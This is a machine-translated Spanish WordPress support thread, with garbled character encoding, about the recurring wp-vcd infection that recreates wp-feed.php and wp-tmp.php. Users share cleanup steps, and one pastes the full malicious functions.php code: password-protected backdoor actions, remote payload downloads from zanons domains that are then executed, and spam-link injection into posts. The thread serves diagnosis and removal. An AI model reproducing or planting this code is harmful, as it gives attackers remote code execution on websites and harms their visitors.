Pregunta sobre Arreglando WordPress de Wordpress:

wp-feed.php

Un usuario pregunt贸 馃憞

Hola,

Sigo recibiendo un mensaje que dice que ‘../wp-includes/wp-feed.php’ no es parte de la instalaci贸n de wordpress donde wordfence indica que es malicioso.

驴As铆 que lo elimino y luego se vuelve a crear autom谩ticamente?

驴Alguna idea por favor?

(@macmanx)

Moderador voluntario

Hace 3 a帽os, 3 meses

El informe de Wordfence es ciertamente correcto.

Recomiendo informar el problema en https://wordpress.org/support/plugin/wordfence para que los desarrolladores y la comunidad de soporte del plugin puedan ayudarlo con esto.

O siga esta gu铆a con atenci贸n. Una vez que haya terminado, es posible que desee implementar algunas (si no todas) de las medidas de seguridad recomendadas.

(@jerodbarlow)

Hace 3 a帽os, 3 meses

Hola James y Rik0399,

Recientemente descubrimos que se trata de adware en un sitio que operamos, pero nos resulta dif铆cil mantener el c贸digo en cuenta. Lo que s铆 sabemos es que este peque帽o error b谩sicamente crea el archivo wp-feed.php y enumera cualquier direcci贸n IP asociada con un usuario registrado. Entonces, si inicia sesi贸n en WordPress en su sitio, ya no ver谩 los anuncios de spam.

Sin embargo, las direcciones IP que nunca han iniciado sesi贸n en el sitio ciertamente recibir谩n las notificaciones y, a veces, ser谩n redirigidas desde todo el sitio.

Pens茅 en publicar en caso de que pudiera obtener el c贸digo fuente de manera responsable. Ahora estamos revisando nuestros archivos con la esperanza de resolver el problema.

Jerod

(@ rik0399)

Hace 3 a帽os, 3 meses

Hola,

Gracias por eso,

He estado trabajando en todo, pero hasta ahora, sin alegr铆a.

(@paolopanatta)

Hace 3 a帽os, 2 meses

Pru茅belo si se trata de acci贸n / recuperaci贸n de WP Rocket.

(@itsmrkim)

Hace 3 a帽os, 2 meses

Hola chicos, tengo el mismo problema en mi sitio en este momento, sin embargo, solo afecta a ciertos tipos de usuarios: solo afecta a los usuarios de Windows para computadoras de escritorio y afecta a todos los usuarios del tel茅fono bolsillo / tableta. 驴Pudiste encontrar la causa ra铆z / el gui贸n de esta pregunta?

Saludos, Sam K.

Esta respuesta fue modificada hace 3 a帽os, 2 meses por.

(@jerodbarlow)

Hace 3 a帽os, 2 meses

Hola Sam,

No puedo recordar / encontrar el c贸digo exacto que extrajimos, pero se encontr贸 en nuestro archivo functions.php en el tema, y 鈥嬧媏stoy seguro de que el c贸digo era anal贸gico y visible en la parte frontal del c贸digo fuente de nuestro sitio.

隆Espero que ayude!

Jerod

(@akodia)

Hace 3 a帽os, 2 meses

Hola chicos,

Tuve el mismo problema hoy y lo solucion茅 usando el plugin Anti-Malware Security y Brute-Force Firewall. Confirm贸 que el archivo infectado es el archivo functions.php en el tema actual del sitio web. Luego se agreg贸 alg煤n c贸digo malicioso. El plugin lo elimina y es bueno que te vayas.

Por favor, intente informar a los dem谩s si le funcion贸 o no.

Todo lo mejor. MAM脕

(@bmerigan)

Hace 3 a帽os, 1 mes

Encontr茅 wp-feed.php en mi directorio wp-includes. Es parte de una infecci贸n de malware. Este archivo contiene las direcciones IP de los usuarios que iniciaron sesi贸n en un sitio de WordPress. No muestra las notificaciones de inyecci贸n a los usuarios autenticados.

Los archivos que debe verificar y eliminar: wp-feed.php wp-vcd.php wp-tmp.php Numerosas copias de class.theme-module.php Y extraiga un mont贸n de c贸digo desde el principio de todos los archivos functions.php. .

Esta respuesta fue modificada hace 3 a帽os, hace un mes por.

(@bobdesign)

Hace 3 a帽os, 1 mes

Solo para usted, agregue los agujeros functions.php en la carpeta del tema en su contenido de wp y todo estar谩 bien.

Puede encontrar algunos en l铆nea con 鈥渨p-vcd.php鈥 鈥︹ esto es malware.

Salud.

(@ embalaje88)

Hace 2 a帽os, 11 meses

Oye, tengo la misma pregunta y este tema me ayud贸 a resolverla, 隆gracias! Debajo de lo que hice: – cambi茅 todas sus contrase帽as para todos los WP, FTP, base de datos – para todos los WP instalados (no ten铆a mucho), vaya a wp-content / theme / YOURTHEME / functions.php y comprobar, si el c贸digo inicial no es sospechoso. El m铆o aparece a continuaci贸n:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?phpn" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?><?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5'))
	{
		switch ($_REQUEST['action'])
			{
				case 'get_all_links';
					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
						{
							$data['code'] = '';
							
							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
								{
									$data['code'] = $_[1];
								}
							
							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";
						}
				break;
				
				case 'set_id_links';
					if (isset($_REQUEST['data']))
						{
							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
							
							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
								{
									print "true";
								}
						}
				break;
				
				case 'create_page';
					if (isset($_REQUEST['remove_page']))
						{
							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
								{
									print "true";
								}
						}
					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
						{
							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
								{
									print "true";
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_URL_CD";
			}
			
		die("");
	}

	
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
	{
		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
		if ($data -> full_content)
			{
				print stripslashes($data -> content);
			}
		else
			{
				print '<!DOCTYPE html>';
				print '<html ';
				language_attributes();
				print ' class="no-js">';
				print '<head>';
				print '<title>'.stripslashes($data -> title).'</title>';
				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
				print '<meta name="robots" content="index, follow" />';
				print '<meta charset="';
				bloginfo( 'charset' );
				print '" />';
				print '<meta name="viewport" content="width=device-width">';
				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
				print '<link rel="pingback" href="';
				bloginfo( 'pingback_url' );
				print '">';
				wp_head();
				print '</head>';
				print '<body>';
				print '<div id="content" class="site-content">';
				print stripslashes($data -> content);
				get_search_form();
				get_sidebar();
				get_footer();
			}
			
		exit;
	}

?>

– elimine el comienzo de los art铆culos masculinos – vaya a / wp-include y verifique si tiene algunos de esos archivos:

wp-tmp.php wp-vcd.php wp-feed.php wp-cd.php

Si es as铆, verif铆quelos, probablemente sean maleware y elim铆nelos. – revise su sitio web si el problema persiste – instale el plugin Wordfence y revise su sitio web nuevamente 馃槈

(@ locha9066)

Hace 2 a帽os, 11 meses

hola @ pap88, tengo el mismo problema.

Me registr茅 wp-tmp.php Se ve como esto: https://pastebin.com/i68AgRPi

Le铆 el c贸digo, este c贸digo parece querer redirigir el acceso de todos los clientes a mi sitio tambi茅n para acceder a su sitio en un grado incremental en muchas otras b煤squedas. setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);.

Borr茅 un c贸digo extra帽o en function.php y wp-tmp.php, wp-vcd.php, wp-feed.php, wp-cd.php. Pero cuando mi sitio web F5, genera autom谩ticamente wp-tmp.php. 驴Alg煤n m茅todo de depuraci贸n inicia la causa? Cualquier sugerencia de usted es la soluci贸n para m铆 en esta situaci贸n.

Dominio: http://www.zanons.xyz/code.php

(@bmerigan)

Hace 2 a帽os, 11 meses

Como dije antes, estos archivos tambi茅n:

Numerosas copias de class.theme-module.php Y extraiga un mont贸n de c贸digo desde el principio de todos los archivos functions.php.

Verifique TODOS los archivos functions.php en el tema y elimine TODOS los archivos class.theme-module.php Estos se pueden encontrar en diferentes lugares en un tema. Si el tema se carga antes de que se eliminen todos, los dem谩s archivos vuelven.

(@ locha9066)

Hace 2 a帽os, 11 meses

@bmerigan, 驴sabes d贸nde comienza el problema?

No subo mi fuente en el alojamiento, se est谩 ejecutando en localhost.

No s茅 por qu茅 tienes un c贸digo extra帽o function.php.

驴Alg煤n m茅todo para detectar alg煤n plugin o tema tiene alg煤n c贸digo extra帽o para depurar?

Utilizo el tema: Flatsome y WPResidence en ThemeForest (ambos temas tienen los mismos problemas).

Es el mismo plugin en ambos temas: Loco Translate, Yoast THIS.

(@bmerigan)

Hace 2 a帽os, 11 meses

Mi experiencia fue descargar un tema de un sitio 芦gratuito禄 en lugar del creador / fuente original. El sitio del que obtuve era poco fiable y solo proporcionaba temas infectados.

Mi experiencia fue que instal茅 un tema infectado que conten铆a el c贸digo y los archivos maliciosos.

(@ entr0phy777)

Hace 2 a帽os, 10 meses

Mi caso es que /ajax-search-pro/includes/functions/class.theme-modules.php es el 煤nico lugar donde class.theme-module.php.

As铆 que la fuente del aditivo tambi茅n puede ser cuestionable, como dice bmerigan.

驴Solucion贸 tu problema??

0 / 0

Deja una respuesta 0

Tu direcci贸n de correo electr贸nico no ser谩 publicada. Los campos obligatorios est谩n marcados con *